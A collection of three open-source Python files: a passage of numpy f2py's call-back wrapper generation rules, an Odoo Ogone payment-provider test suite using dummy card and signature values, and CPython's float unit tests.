'docstropt': {l_and(isoptional, isintent_nothide): '\t\t#pydocsign#'},
'docstrreq': {l_and(isrequired, isintent_nothide): '\t\t#pydocsign#'},
'docstrout': {isintent_out: '\t\t#pydocsignout#'},
'latexdocstropt': {l_and(isoptional, isintent_nothide): ['\\item[]{{}\\verb@#pydocsign#@{}}',
{hasnote: '--- #note#'}]},
'latexdocstrreq': {l_and(isrequired, isintent_nothide): ['\\item[]{{}\\verb@#pydocsign#@{}}',
{hasnote: '--- #note#'}]},
'latexdocstrout': {isintent_out: ['\\item[]{{}\\verb@#pydocsignout#@{}}',
{l_and(hasnote, isintent_hide): '--- #note#',
l_and(hasnote, isintent_nothide): '--- See above.'}]},
'docsign': {l_and(isrequired, isintent_nothide): '#varname#,'},
'docsignopt': {l_and(isoptional, isintent_nothide): '#varname#,'},
'depend': ''
},
{
'args': {
l_and(isscalar, isintent_c): '#ctype# #varname_i#',
l_and(isscalar, l_not(isintent_c)): '#ctype# *#varname_i#_cb_capi',
isarray: '#ctype# *#varname_i#',
isstring: '#ctype# #varname_i#'
},
'args_nm': {
l_and(isscalar, isintent_c): '#varname_i#',
l_and(isscalar, l_not(isintent_c)): '#varname_i#_cb_capi',
isarray: '#varname_i#',
isstring: '#varname_i#'
},
'args_td': {
l_and(isscalar, isintent_c): '#ctype#',
l_and(isscalar, l_not(isintent_c)): '#ctype# *',
isarray: '#ctype# *',
isstring: '#ctype#'
},
# untested with multiple args
'strarglens': {isstring: ',int #varname_i#_cb_len'},
'strarglens_td': {isstring: ',int'}, # untested with multiple args
# untested with multiple args
'strarglens_nm': {isstring: ',#varname_i#_cb_len'},
},
{ # Scalars
'decl': {l_not(isintent_c): '\t#ctype# #varname_i#=(*#varname_i#_cb_capi);'},
'error': {l_and(isintent_c, isintent_out,
throw_error('intent(c,out) is forbidden for callback scalar arguments')):
''},
'frompyobj': [{debugcapi: '\tCFUNCSMESS("cb:Getting #varname#->");'},
{isintent_out:
'\tif (capi_j>capi_i)\n\t\tGETSCALARFROMPYTUPLE(capi_return,capi_i++,#varname_i#_cb_capi,#ctype#,"#ctype#_from_pyobj failed in converting argument #varname# of call-back function #name# to C #ctype#\\n");'},
{l_and(debugcapi, l_and(l_not(iscomplex), isintent_c)):
'\tfprintf(stderr,"#showvalueformat#.\\n",#varname_i#);'},
{l_and(debugcapi, l_and(l_not(iscomplex), l_not( isintent_c))):
'\tfprintf(stderr,"#showvalueformat#.\\n",*#varname_i#_cb_capi);'},
{l_and(debugcapi, l_and(iscomplex, isintent_c)):
'\tfprintf(stderr,"#showvalueformat#.\\n",(#varname_i#).r,(#varname_i#).i);'},
{l_and(debugcapi, l_and(iscomplex, l_not( isintent_c))):
'\tfprintf(stderr,"#showvalueformat#.\\n",(*#varname_i#_cb_capi).r,(*#varname_i#_cb_capi).i);'},
],
'need': [{isintent_out: ['#ctype#_from_pyobj', 'GETSCALARFROMPYTUPLE']},
{debugcapi: 'CFUNCSMESS'}],
'_check': isscalar
}, {
'pyobjfrom': [{isintent_in: """\
\tif (#name#_nofargs>capi_i)
\t\tif (PyTuple_SetItem((PyObject *)capi_arglist,capi_i++,pyobj_from_#ctype#1(#varname_i#)))
\t\t\tgoto capi_fail;"""},
{isintent_inout: """\
\tif (#name#_nofargs>capi_i)
\t\tif (PyTuple_SetItem((PyObject *)capi_arglist,capi_i++,pyarr_from_p_#ctype#1(#varname_i#_cb_capi)))
\t\t\tgoto capi_fail;"""}],
'need': [{isintent_in: 'pyobj_from_#ctype#1'},
{isintent_inout: 'pyarr_from_p_#ctype#1'},
{iscomplex: '#ctype#'}],
'_check': l_and(isscalar, isintent_nothide),
'_optional': ''
}, { # String
'frompyobj': [{debugcapi: '\tCFUNCSMESS("cb:Getting #varname#->\\"");'},
"""\tif (capi_j>capi_i)
\t\tGETSTRFROMPYTUPLE(capi_return,capi_i++,#varname_i#,#varname_i#_cb_len);""",
{debugcapi:
'\tfprintf(stderr,"#showvalueformat#\\":%d:.\\n",#varname_i#,#varname_i#_cb_len);'},
],
'need': ['#ctype#', 'GETSTRFROMPYTUPLE',
{debugcapi: 'CFUNCSMESS'}, 'string.h'],
'_check': l_and(isstring, isintent_out)
}, {
'pyobjfrom': [{debugcapi: '\tfprintf(stderr,"debug-capi:cb:#varname#=\\"#showvalueformat#\\":%d:\\n",#varname_i#,#varname_i#_cb_len);'},
{isintent_in: """\
\tif (#name#_nofargs>capi_i)
\t\tif (PyTuple_SetItem((PyObject *)capi_arglist,capi_i++,pyobj_from_#ctype#1size(#varname_i#,#varname_i#_cb_len)))
\t\t\tgoto capi_fail;"""},
{isintent_inout: """\
\tif (#name#_nofargs>capi_i) {
\t\tint #varname_i#_cb_dims[] = {#varname_i#_cb_len};
\t\tif (PyTuple_SetItem((PyObject *)capi_arglist,capi_i++,pyarr_from_p_#ctype#1(#varname_i#,#varname_i#_cb_dims)))
\t\t\tgoto capi_fail;
\t}"""}],
'need': [{isintent_in: 'pyobj_from_#ctype#1size'},
{isintent_inout: 'pyarr_from_p_#ctype#1'}],
'_check': l_and(isstring, isintent_nothide),
'_optional': ''
},
# Array ...
{
'decl': '\tnpy_intp #varname_i#_Dims[#rank#] = {#rank*[-1]#};',
'setdims': '\t#cbsetdims#;',
'_check': isarray,
'_depend': ''
},
{
'pyobjfrom': [{debugcapi: '\tfprintf(stderr,"debug-capi:cb:#varname#\\n");'},
{isintent_c: """\
\tif (#name#_nofargs>capi_i) {
\t\tPyArrayObject *tmp_arr = (PyArrayObject *)PyArray_New(&PyArray_Type,#rank#,#varname_i#_Dims,#atype#,NULL,(char*)#varname_i#,0,NPY_ARRAY_CARRAY,NULL); /*XXX: Hmm, what will destroy this array??? */
""",
l_not(isintent_c): """\
\tif (#name#_nofargs>capi_i) {
\t\tPyArrayObject *tmp_arr = (PyArrayObject *)PyArray_New(&PyArray_Type,#rank#,#varname_i#_Dims,#atype#,NULL,(char*)#varname_i#,0,NPY_ARRAY_FARRAY,NULL); /*XXX: Hmm, what will destroy this array??? */
""",
},
"""
\t\tif (tmp_arr==NULL)
\t\t\tgoto capi_fail;
\t\tif (PyTuple_SetItem((PyObject *)capi_arglist,capi_i++,(PyObject *)tmp_arr))
\t\t\tgoto capi_fail;
}"""],
'_check': l_and(isarray, isintent_nothide, l_or(isintent_in, isintent_inout)),
'_optional': '',
}, {
'frompyobj': [{debugcapi: '\tCFUNCSMESS("cb:Getting #varname#->");'},
"""\tif (capi_j>capi_i) {
\t\tPyArrayObject *rv_cb_arr = NULL;
\t\tif ((capi_tmp = PyTuple_GetItem(capi_return,capi_i++))==NULL) goto capi_fail;
\t\trv_cb_arr = array_from_pyobj(#atype#,#varname_i#_Dims,#rank#,F2PY_INTENT_IN""",
{isintent_c: '|F2PY_INTENT_C'},
""",capi_tmp);
\t\tif (rv_cb_arr == NULL) {
\t\t\tfprintf(stderr,\"rv_cb_arr is NULL\\n\");
\t\t\tgoto capi_fail;
\t\t}
\t\tMEMCOPY(#varname_i#,PyArray_DATA(rv_cb_arr),PyArray_NBYTES(rv_cb_arr));
\t\tif (capi_tmp != (PyObject *)rv_cb_arr) {
\t\t\tPy_DECREF(rv_cb_arr);
\t\t}
\t}""",
{debugcapi: '\tfprintf(stderr,"<-.\\n");'},
],
'need': ['MEMCOPY', {iscomplexarray: '#ctype#'}],
'_check': l_and(isarray, isintent_out)
}, {
'docreturn': '#varname#,',
'_check': isintent_out
}
]
################## Build call-back module #############
cb_map = {}
def buildcallbacks(m):
global cb_map
cb_map[m['name']] = []
for bi in m['body']:
if bi['block'] == 'interface':
for b in bi['body']:
if b:
buildcallback(b, m['name'])
else:
errmess('warning: empty body for %s\n' % (m['name']))
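# Illustrative sketch (assumed minimal crackfortran-style input, not in the
# original source): buildcallbacks() scans a module block for interface
# bodies and constructs one call-back wrapper per routine found there.
#
#     m = {'name': 'mymod',
#          'body': [{'block': 'interface',
#                    'body': [routine_block]}]}   # routine_block: hypothetical
#     buildcallbacks(m)   # invokes buildcallback(routine_block, 'mymod')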
def buildcallback(rout, um):
global cb_map
from . import capi_maps
outmess('\tConstructing call-back function "cb_%s_in_%s"\n' %
(rout['name'], um))
args, depargs = getargs(rout)
capi_maps.depargs = depargs
var = rout['vars']
vrd = capi_maps.cb_routsign2map(rout, um)
rd = dictappend({}, vrd)
cb_map[um].append([rout['name'], rd['name']])
for r in cb_rout_rules:
if ('_check' in r and r['_check'](rout)) or ('_check' not in r):
ar = applyrules(r, vrd, rout)
rd = dictappend(rd, ar)
savevrd = {}
for i, a in enumerate(args):
vrd = capi_maps.cb_sign2map(a, var[a], index=i)
savevrd[a] = vrd
for r in cb_arg_rules:
if '_depend' in r:
continue
if '_optional' in r and isoptional(var[a]):
continue
if ('_check' in r and r['_check'](var[a])) or ('_check' not in r):
ar = applyrules(r, vrd, var[a])
rd = dictappend(rd, ar)
if '_break' in r:
break
for a in args:
vrd = savevrd[a]
for r in cb_arg_rules:
if '_depend' in r:
continue
if ('_optional' not in r) or ('_optional' in r and isrequired(var[a])):
continue
if ('_check' in r and r['_check'](var[a])) or ('_check' not in r):
ar = applyrules(r, vrd, var[a])
rd = dictappend(rd, ar)
if '_break' in r:
break
for a in depargs:
vrd = savevrd[a]
for r in cb_arg_rules:
if '_depend' not in r:
continue
if '_optional' in r:
continue
if ('_check' in r and r['_check'](var[a])) or ('_check' not in r):
ar = applyrules(r, vrd, var[a])
rd = dictappend(rd, ar)
if '_break' in r:
break
if 'args' in rd and 'optargs' in rd:
if isinstance(rd['optargs'], list):
rd['optargs'] = rd['optargs'] + ["""
#ifndef F2PY_CB_RETURNCOMPLEX
,
#endif
"""]
rd['optargs_nm'] = rd['optargs_nm'] + ["""
#ifndef F2PY_CB_RETURNCOMPLEX
,
#endif
"""]
rd['optargs_td'] = rd['optargs_td'] + ["""
#ifndef F2PY_CB_RETURNCOMPLEX
,
#endif
"""]
if isinstance(rd['docreturn'], list):
rd['docreturn'] = stripcomma(
replace('#docreturn#', {'docreturn': rd['docreturn']}))
optargs = stripcomma(replace('#docsignopt#',
{'docsignopt': rd['docsignopt']}
))
if optargs == '':
rd['docsignature'] = stripcomma(
replace('#docsign#', {'docsign': rd['docsign']}))
else:
rd['docsignature'] = replace('#docsign#[#docsignopt#]',
{'docsign': rd['docsign'],
'docsignopt': optargs,
})
rd['latexdocsignature'] = rd['docsignature'].replace('_', '\\_')
rd['latexdocsignature'] = rd['latexdocsignature'].replace(',', ', ')
rd['docstrsigns'] = []
rd['latexdocstrsigns'] = []
for k in ['docstrreq', 'docstropt', 'docstrout', 'docstrcbs']:
if k in rd and isinstance(rd[k], list):
rd['docstrsigns'] = rd['docstrsigns'] + rd[k]
k = 'latex' + k
if k in rd and isinstance(rd[k], list):
rd['latexdocstrsigns'] = rd['latexdocstrsigns'] + rd[k][0:1] +\
['\\begin{description}'] + rd[k][1:] +\
['\\end{description}']
if 'args' not in rd:
rd['args'] = ''
rd['args_td'] = ''
rd['args_nm'] = ''
if not (rd.get('args') or rd.get('optargs') or rd.get('strarglens')):
rd['noargs'] = 'void'
ar = applyrules(cb_routine_rules, rd)
cfuncs.callbacks[rd['name']] = ar['body']
if isinstance(ar['need'], str):
ar['need'] = [ar['need']]
if 'need' in rd:
for t in cfuncs.typedefs.keys():
if t in rd['need']:
ar['need'].append(t)
cfuncs.typedefs_generated[rd['name'] + '_typedef'] = ar['cbtypedefs']
ar['need'].append(rd['name'] + '_typedef')
cfuncs.needs[rd['name']] = ar['need']
capi_maps.lcb2_map[rd['name']] = {'maxnofargs': ar['maxnofargs'],
'nofoptargs': ar['nofoptargs'],
'docstr': ar['docstr'],
'latexdocstr': ar['latexdocstr'],
'argname': rd['argname']
}
outmess('\t %s\n' % (ar['docstrshort']))
return
################## Build call-back function #############
# ======================================================================
# repo: alexcuellar/odoo
# path: addons/payment_ogone/tests/test_ogone.py
# license: agpl-3.0
# ======================================================================
# -*- coding: utf-8 -*-
from lxml import objectify
import time
import urlparse
from openerp.addons.payment.models.payment_acquirer import ValidationError
from openerp.addons.payment.tests.common import PaymentAcquirerCommon
from openerp.addons.payment_ogone.controllers.main import OgoneController
from openerp.tools import mute_logger
class OgonePayment(PaymentAcquirerCommon):
def setUp(self):
super(OgonePayment, self).setUp()
cr, uid = self.cr, self.uid
self.base_url = self.registry('ir.config_parameter').get_param(cr, uid, 'web.base.url')
# get the ogone account
model, self.ogone_id = self.registry('ir.model.data').get_object_reference(cr, uid, 'payment_ogone', 'payment_acquirer_ogone')
def test_10_ogone_form_render(self):
cr, uid, context = self.cr, self.uid, {}
# be sure not to do anything stupid
ogone = self.payment_acquirer.browse(self.cr, self.uid, self.ogone_id, None)
self.assertEqual(ogone.environment, 'test', 'test without test environment')
# ----------------------------------------
# Test: button direct rendering + shasign
# ----------------------------------------
form_values = {
'PSPID': 'dummy',
'ORDERID': 'test_ref0',
'AMOUNT': '1',
'CURRENCY': 'EUR',
'LANGUAGE': 'en_US',
'CN': 'Norbert Buyer',
'EMAIL': '[email protected]',
'OWNERZIP': '1000',
'OWNERADDRESS': 'Huge Street 2/543',
'OWNERCTY': 'Belgium',
'OWNERTOWN': 'Sin City',
'OWNERTELNO': '0032 12 34 56 78',
'SHASIGN': '815f67b8ff70d234ffcf437c13a9fa7f807044cc',
'ACCEPTURL': '%s' % urlparse.urljoin(self.base_url, OgoneController._accept_url),
'DECLINEURL': '%s' % urlparse.urljoin(self.base_url, OgoneController._decline_url),
'EXCEPTIONURL': '%s' % urlparse.urljoin(self.base_url, OgoneController._exception_url),
'CANCELURL': '%s' % urlparse.urljoin(self.base_url, OgoneController._cancel_url),
}
# render the button
res = self.payment_acquirer.render(
cr, uid, self.ogone_id,
'test_ref0', 0.01, self.currency_euro_id,
partner_id=None,
partner_values=self.buyer_values,
context=context)
# check form result
tree = objectify.fromstring(res)
self.assertEqual(tree.get('action'), 'https://secure.ogone.com/ncol/test/orderstandard.asp', 'ogone: wrong form POST url')
for form_input in tree.input:
if form_input.get('name') in ['submit']:
continue
self.assertEqual(
form_input.get('value'),
form_values[form_input.get('name')],
'ogone: wrong value for input %s: received %s instead of %s' % (form_input.get('name'), form_input.get('value'), form_values[form_input.get('name')])
)
# ----------------------------------------
# Test2: button using tx + validation
# ----------------------------------------
# create a new draft tx
tx_id = self.payment_transaction.create(
cr, uid, {
'amount': 0.01,
'acquirer_id': self.ogone_id,
'currency_id': self.currency_euro_id,
'reference': 'test_ref0',
'partner_id': self.buyer_id,
}, context=context
)
# render the button
res = self.payment_acquirer.render(
cr, uid, self.ogone_id,
'should_be_erased', 0.01, self.currency_euro,
tx_id=tx_id,
partner_id=None,
partner_values=self.buyer_values,
context=context)
# check form result
tree = objectify.fromstring(res)
self.assertEqual(tree.get('action'), 'https://secure.ogone.com/ncol/test/orderstandard.asp', 'ogone: wrong form POST url')
for form_input in tree.input:
if form_input.get('name') in ['submit']:
continue
self.assertEqual(
form_input.get('value'),
form_values[form_input.get('name')],
'ogone: wrong value for form input %s: received %s instead of %s' % (form_input.get('name'), form_input.get('value'), form_values[form_input.get('name')])
)
@mute_logger('openerp.addons.payment_ogone.models.ogone', 'ValidationError')
def test_20_ogone_form_management(self):
cr, uid, context = self.cr, self.uid, {}
# be sure not to do anything stupid
ogone = self.payment_acquirer.browse(self.cr, self.uid, self.ogone_id, None)
self.assertEqual(ogone.environment, 'test', 'test without test environment')
# typical data posted by ogone after client has successfully paid
ogone_post_data = {
'orderID': u'test_ref_2',
'STATUS': u'9',
'CARDNO': u'XXXXXXXXXXXX0002',
'PAYID': u'25381582',
'CN': u'Norbert Buyer',
'NCERROR': u'0',
'TRXDATE': u'11/15/13',
'IP': u'85.201.233.72',
'BRAND': u'VISA',
'ACCEPTANCE': u'test123',
'currency': u'EUR',
'amount': u'1.95',
'SHASIGN': u'7B7B0ED9CBC4A85543A9073374589033A62A05A5',
'ED': u'0315',
'PM': u'CreditCard'
}
# should raise error about unknown tx
with self.assertRaises(ValidationError):
self.payment_transaction.ogone_form_feedback(cr, uid, ogone_post_data, context=context)
# create tx
tx_id = self.payment_transaction.create(
cr, uid, {
'amount': 1.95,
'acquirer_id': self.ogone_id,
'currency_id': self.currency_euro_id,
'reference': 'test_ref_2',
'partner_name': 'Norbert Buyer',
'partner_country_id': self.country_france_id,
}, context=context
)
# validate it
self.payment_transaction.ogone_form_feedback(cr, uid, ogone_post_data, context=context)
# check state
tx = self.payment_transaction.browse(cr, uid, tx_id, context=context)
self.assertEqual(tx.state, 'done', 'ogone: validation did not put tx into done state')
self.assertEqual(tx.ogone_payid, ogone_post_data.get('PAYID'), 'ogone: validation did not update tx payid')
# reset tx
tx.write({'state': 'draft', 'date_validate': False, 'ogone_payid': False})
# now ogone post is ok: try to modify the SHASIGN
ogone_post_data['SHASIGN'] = 'a4c16bae286317b82edb49188d3399249a784691'
with self.assertRaises(ValidationError):
self.payment_transaction.ogone_form_feedback(cr, uid, ogone_post_data, context=context)
# simulate an error
ogone_post_data['STATUS'] = 2
ogone_post_data['SHASIGN'] = 'a4c16bae286317b82edb49188d3399249a784691'
self.payment_transaction.ogone_form_feedback(cr, uid, ogone_post_data, context=context)
# check state
tx = self.payment_transaction.browse(cr, uid, tx_id, context=context)
self.assertEqual(tx.state, 'error', 'ogone: erroneous validation did not put tx into error state')
def test_30_ogone_s2s(self):
test_ref = 'test_ref_%.15f' % time.time()
cr, uid, context = self.cr, self.uid, {}
# be sure not to do anything stupid
ogone = self.payment_acquirer.browse(self.cr, self.uid, self.ogone_id, None)
self.assertEqual(ogone.environment, 'test', 'test without test environment')
# create a new draft tx
tx_id = self.payment_transaction.create(
cr, uid, {
'amount': 0.01,
'acquirer_id': self.ogone_id,
'currency_id': self.currency_euro_id,
'reference': test_ref,
'partner_id': self.buyer_id,
'type': 'server2server',
}, context=context
)
# create an alias
res = self.payment_transaction.ogone_s2s_create_alias(
cr, uid, tx_id, {
'expiry_date_mm': '01',
'expiry_date_yy': '2015',
'holder_name': 'Norbert Poilu',
'number': '4000000000000002',
'brand': 'VISA',
}, context=context)
# check an alias is set, containing at least OPENERP
tx = self.payment_transaction.browse(cr, uid, tx_id, context=context)
self.assertIn('OPENERP', tx.partner_reference, 'ogone: wrong partner reference after creating an alias')
res = self.payment_transaction.ogone_s2s_execute(cr, uid, tx_id, {}, context=context)
# print res
# {
# 'orderID': u'reference',
# 'STATUS': u'9',
# 'CARDNO': u'XXXXXXXXXXXX0002',
# 'PAYID': u'24998692',
# 'CN': u'Norbert Poilu',
# 'NCERROR': u'0',
# 'TRXDATE': u'11/05/13',
# 'IP': u'85.201.233.72',
# 'BRAND': u'VISA',
# 'ACCEPTANCE': u'test123',
# 'currency': u'EUR',
# 'amount': u'1.95',
# 'SHASIGN': u'EFDC56879EF7DE72CCF4B397076B5C9A844CB0FA',
# 'ED': u'0314',
# 'PM': u'CreditCard'
# }
# ======================================================================
# repo: dennis-sheil/commandergenius
# path: project/jni/python/src/Lib/test/test_float.py
# ======================================================================
import unittest, struct
import os
from test import test_support
import math
from math import isinf, isnan, copysign, ldexp
import operator
import random, fractions
INF = float("inf")
NAN = float("nan")
class GeneralFloatCases(unittest.TestCase):
def test_float(self):
self.assertEqual(float(3.14), 3.14)
self.assertEqual(float(314), 314.0)
self.assertEqual(float(314L), 314.0)
self.assertEqual(float(" 3.14 "), 3.14)
self.assertRaises(ValueError, float, " 0x3.1 ")
self.assertRaises(ValueError, float, " -0x3.p-1 ")
self.assertRaises(ValueError, float, " +0x3.p-1 ")
self.assertRaises(ValueError, float, "++3.14")
self.assertRaises(ValueError, float, "+-3.14")
self.assertRaises(ValueError, float, "-+3.14")
self.assertRaises(ValueError, float, "--3.14")
if test_support.have_unicode:
self.assertEqual(float(unicode(" 3.14 ")), 3.14)
self.assertEqual(float(unicode(" \u0663.\u0661\u0664 ",'raw-unicode-escape')), 3.14)
# Implementation limitation in PyFloat_FromString()
self.assertRaises(ValueError, float, unicode("1"*10000))
@test_support.run_with_locale('LC_NUMERIC', 'fr_FR', 'de_DE')
def test_float_with_comma(self):
# set locale to something that doesn't use '.' for the decimal point
# float must not accept the locale-specific decimal point but
# it still has to accept the normal python syntax
import locale
if not locale.localeconv()['decimal_point'] == ',':
return
self.assertEqual(float(" 3.14 "), 3.14)
self.assertEqual(float("+3.14 "), 3.14)
self.assertEqual(float("-3.14 "), -3.14)
self.assertEqual(float(".14 "), .14)
self.assertEqual(float("3. "), 3.0)
self.assertEqual(float("3.e3 "), 3000.0)
self.assertEqual(float("3.2e3 "), 3200.0)
self.assertEqual(float("2.5e-1 "), 0.25)
self.assertEqual(float("5e-1"), 0.5)
self.assertRaises(ValueError, float, " 3,14 ")
self.assertRaises(ValueError, float, " +3,14 ")
self.assertRaises(ValueError, float, " -3,14 ")
self.assertRaises(ValueError, float, " 0x3.1 ")
self.assertRaises(ValueError, float, " -0x3.p-1 ")
self.assertRaises(ValueError, float, " +0x3.p-1 ")
self.assertEqual(float(" 25.e-1 "), 2.5)
self.assertEqual(test_support.fcmp(float(" .25e-1 "), .025), 0)
def test_floatconversion(self):
# Make sure that calls to __float__() work properly
class Foo0:
def __float__(self):
return 42.
class Foo1(object):
def __float__(self):
return 42.
class Foo2(float):
def __float__(self):
return 42.
class Foo3(float):
def __new__(cls, value=0.):
return float.__new__(cls, 2*value)
def __float__(self):
return self
class Foo4(float):
def __float__(self):
return 42
self.assertAlmostEqual(float(Foo0()), 42.)
self.assertAlmostEqual(float(Foo1()), 42.)
self.assertAlmostEqual(float(Foo2()), 42.)
self.assertAlmostEqual(float(Foo3(21)), 42.)
self.assertRaises(TypeError, float, Foo4(42))
def test_floatasratio(self):
for f, ratio in [
(0.875, (7, 8)),
(-0.875, (-7, 8)),
(0.0, (0, 1)),
(11.5, (23, 2)),
]:
self.assertEqual(f.as_integer_ratio(), ratio)
for i in range(10000):
f = random.random()
f *= 10 ** random.randint(-100, 100)
n, d = f.as_integer_ratio()
self.assertEqual(float(n).__truediv__(d), f)
R = fractions.Fraction
self.assertEqual(R(0, 1),
R(*float(0.0).as_integer_ratio()))
self.assertEqual(R(5, 2),
R(*float(2.5).as_integer_ratio()))
self.assertEqual(R(1, 2),
R(*float(0.5).as_integer_ratio()))
self.assertEqual(R(4728779608739021, 2251799813685248),
R(*float(2.1).as_integer_ratio()))
self.assertEqual(R(-4728779608739021, 2251799813685248),
R(*float(-2.1).as_integer_ratio()))
self.assertEqual(R(-2100, 1),
R(*float(-2100.0).as_integer_ratio()))
self.assertRaises(OverflowError, float('inf').as_integer_ratio)
self.assertRaises(OverflowError, float('-inf').as_integer_ratio)
self.assertRaises(ValueError, float('nan').as_integer_ratio)
class FormatFunctionsTestCase(unittest.TestCase):
def setUp(self):
self.save_formats = {'double':float.__getformat__('double'),
'float':float.__getformat__('float')}
def tearDown(self):
float.__setformat__('double', self.save_formats['double'])
float.__setformat__('float', self.save_formats['float'])
def test_getformat(self):
self.assert_(float.__getformat__('double') in
['unknown', 'IEEE, big-endian', 'IEEE, little-endian'])
self.assert_(float.__getformat__('float') in
['unknown', 'IEEE, big-endian', 'IEEE, little-endian'])
self.assertRaises(ValueError, float.__getformat__, 'chicken')
self.assertRaises(TypeError, float.__getformat__, 1)
def test_setformat(self):
for t in 'double', 'float':
float.__setformat__(t, 'unknown')
if self.save_formats[t] == 'IEEE, big-endian':
self.assertRaises(ValueError, float.__setformat__,
t, 'IEEE, little-endian')
elif self.save_formats[t] == 'IEEE, little-endian':
self.assertRaises(ValueError, float.__setformat__,
t, 'IEEE, big-endian')
else:
self.assertRaises(ValueError, float.__setformat__,
t, 'IEEE, big-endian')
self.assertRaises(ValueError, float.__setformat__,
t, 'IEEE, little-endian')
self.assertRaises(ValueError, float.__setformat__,
t, 'chicken')
self.assertRaises(ValueError, float.__setformat__,
'chicken', 'unknown')
BE_DOUBLE_INF = '\x7f\xf0\x00\x00\x00\x00\x00\x00'
LE_DOUBLE_INF = ''.join(reversed(BE_DOUBLE_INF))
BE_DOUBLE_NAN = '\x7f\xf8\x00\x00\x00\x00\x00\x00'
LE_DOUBLE_NAN = ''.join(reversed(BE_DOUBLE_NAN))
BE_FLOAT_INF = '\x7f\x80\x00\x00'
LE_FLOAT_INF = ''.join(reversed(BE_FLOAT_INF))
BE_FLOAT_NAN = '\x7f\xc0\x00\x00'
LE_FLOAT_NAN = ''.join(reversed(BE_FLOAT_NAN))
# on non-IEEE platforms, attempting to unpack a bit pattern
# representing an infinity or a NaN should raise an exception.
class UnknownFormatTestCase(unittest.TestCase):
def setUp(self):
self.save_formats = {'double':float.__getformat__('double'),
'float':float.__getformat__('float')}
float.__setformat__('double', 'unknown')
float.__setformat__('float', 'unknown')
def tearDown(self):
float.__setformat__('double', self.save_formats['double'])
float.__setformat__('float', self.save_formats['float'])
def test_double_specials_dont_unpack(self):
for fmt, data in [('>d', BE_DOUBLE_INF),
('>d', BE_DOUBLE_NAN),
('<d', LE_DOUBLE_INF),
('<d', LE_DOUBLE_NAN)]:
self.assertRaises(ValueError, struct.unpack, fmt, data)
def test_float_specials_dont_unpack(self):
for fmt, data in [('>f', BE_FLOAT_INF),
('>f', BE_FLOAT_NAN),
('<f', LE_FLOAT_INF),
('<f', LE_FLOAT_NAN)]:
self.assertRaises(ValueError, struct.unpack, fmt, data)
# on an IEEE platform, all we guarantee is that bit patterns
# representing infinities or NaNs do not raise an exception; all else
# is accident (today).
# let's also try to guarantee that -0.0 and 0.0 don't get confused.
class IEEEFormatTestCase(unittest.TestCase):
if float.__getformat__("double").startswith("IEEE"):
def test_double_specials_do_unpack(self):
for fmt, data in [('>d', BE_DOUBLE_INF),
('>d', BE_DOUBLE_NAN),
('<d', LE_DOUBLE_INF),
('<d', LE_DOUBLE_NAN)]:
struct.unpack(fmt, data)
if float.__getformat__("float").startswith("IEEE"):
def test_float_specials_do_unpack(self):
for fmt, data in [('>f', BE_FLOAT_INF),
('>f', BE_FLOAT_NAN),
('<f', LE_FLOAT_INF),
('<f', LE_FLOAT_NAN)]:
struct.unpack(fmt, data)
if float.__getformat__("double").startswith("IEEE"):
def test_negative_zero(self):
import math
def pos_pos():
return 0.0, math.atan2(0.0, -1)
def pos_neg():
return 0.0, math.atan2(-0.0, -1)
def neg_pos():
return -0.0, math.atan2(0.0, -1)
def neg_neg():
return -0.0, math.atan2(-0.0, -1)
self.assertEquals(pos_pos(), neg_pos())
self.assertEquals(pos_neg(), neg_neg())
if float.__getformat__("double").startswith("IEEE"):
def test_underflow_sign(self):
import math
# check that -1e-1000 gives -0.0, not 0.0
self.assertEquals(math.atan2(-1e-1000, -1), math.atan2(-0.0, -1))
self.assertEquals(math.atan2(float('-1e-1000'), -1),
math.atan2(-0.0, -1))
class ReprTestCase(unittest.TestCase):
def test_repr(self):
floats_file = open(os.path.join(os.path.split(__file__)[0],
'floating_points.txt'))
for line in floats_file:
line = line.strip()
if not line or line.startswith('#'):
continue
v = eval(line)
self.assertEqual(v, eval(repr(v)))
floats_file.close()
# Beginning with Python 2.6 float has cross platform compatible
# ways to create and represent inf and nan
class InfNanTest(unittest.TestCase):
def test_inf_from_str(self):
self.assert_(isinf(float("inf")))
self.assert_(isinf(float("+inf")))
self.assert_(isinf(float("-inf")))
self.assert_(isinf(float("infinity")))
self.assert_(isinf(float("+infinity")))
self.assert_(isinf(float("-infinity")))
self.assertEqual(repr(float("inf")), "inf")
self.assertEqual(repr(float("+inf")), "inf")
self.assertEqual(repr(float("-inf")), "-inf")
self.assertEqual(repr(float("infinity")), "inf")
self.assertEqual(repr(float("+infinity")), "inf")
self.assertEqual(repr(float("-infinity")), "-inf")
self.assertEqual(repr(float("INF")), "inf")
self.assertEqual(repr(float("+Inf")), "inf")
self.assertEqual(repr(float("-iNF")), "-inf")
self.assertEqual(repr(float("Infinity")), "inf")
self.assertEqual(repr(float("+iNfInItY")), "inf")
self.assertEqual(repr(float("-INFINITY")), "-inf")
self.assertEqual(str(float("inf")), "inf")
self.assertEqual(str(float("+inf")), "inf")
self.assertEqual(str(float("-inf")), "-inf")
self.assertEqual(str(float("infinity")), "inf")
self.assertEqual(str(float("+infinity")), "inf")
self.assertEqual(str(float("-infinity")), "-inf")
self.assertRaises(ValueError, float, "info")
self.assertRaises(ValueError, float, "+info")
self.assertRaises(ValueError, float, "-info")
self.assertRaises(ValueError, float, "in")
self.assertRaises(ValueError, float, "+in")
self.assertRaises(ValueError, float, "-in")
self.assertRaises(ValueError, float, "infinit")
self.assertRaises(ValueError, float, "+Infin")
self.assertRaises(ValueError, float, "-INFI")
self.assertRaises(ValueError, float, "infinitys")
def test_inf_as_str(self):
self.assertEqual(repr(1e300 * 1e300), "inf")
self.assertEqual(repr(-1e300 * 1e300), "-inf")
self.assertEqual(str(1e300 * 1e300), "inf")
self.assertEqual(str(-1e300 * 1e300), "-inf")
def test_nan_from_str(self):
        self.assertTrue(isnan(float("nan")))
        self.assertTrue(isnan(float("+nan")))
        self.assertTrue(isnan(float("-nan")))
self.assertEqual(repr(float("nan")), "nan")
self.assertEqual(repr(float("+nan")), "nan")
self.assertEqual(repr(float("-nan")), "nan")
self.assertEqual(repr(float("NAN")), "nan")
self.assertEqual(repr(float("+NAn")), "nan")
self.assertEqual(repr(float("-NaN")), "nan")
self.assertEqual(str(float("nan")), "nan")
self.assertEqual(str(float("+nan")), "nan")
self.assertEqual(str(float("-nan")), "nan")
self.assertRaises(ValueError, float, "nana")
self.assertRaises(ValueError, float, "+nana")
self.assertRaises(ValueError, float, "-nana")
self.assertRaises(ValueError, float, "na")
self.assertRaises(ValueError, float, "+na")
self.assertRaises(ValueError, float, "-na")
def test_nan_as_str(self):
self.assertEqual(repr(1e300 * 1e300 * 0), "nan")
self.assertEqual(repr(-1e300 * 1e300 * 0), "nan")
